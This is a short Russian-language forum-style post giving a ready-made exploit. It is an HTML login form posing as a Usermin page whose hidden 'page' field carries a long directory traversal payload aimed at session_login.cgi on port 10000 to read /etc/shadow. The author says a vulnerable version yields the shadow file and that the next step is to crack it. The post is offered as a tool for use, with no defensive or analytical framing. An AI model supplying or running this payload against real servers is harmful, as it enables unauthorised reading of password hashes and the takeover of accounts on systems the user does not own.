Можешь попробовать вот так. Создаем html файл следующего содержания. <form action='http://www.domain.com:10000/session_login.cgi' method=post> <input type=hidden name=page value='/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01 /..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01 /..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01 /..%01/..%01/..%01/..%01/..%01/..%01//etc/shadow'> <table border width=40%> <tr bgcolor=#7f7f7f> <td><b>Login to Usermin</b></td> </tr> <tr bgcolor=#b7b7b7> <td align=center><table cellpadding=3> <tr> <td colspan=2 align=center>You must enter a username and password to login to the Usermin server on <tt>www.fso.arac.com</tt>.</td> </tr> <tr> <td><b>Username</b></td> <td><input name=user size=20 value=''></td> </tr> <tr> <td><b>Password</b></td> <td><input name=pass size=20 type=password></td> </tr> <tr> <td colspan=2 align=center><input type=submit value='Login'> <input type=reset value='Clear'><br> <input type=checkbox name=save value=1> Remember login permanently? </td> </tr> </table></td></tr></table><p> <hr> </form> И если там уязвимая версия Cpanel, то получаем файл /etc/shadow, дальше остается его расшифровать
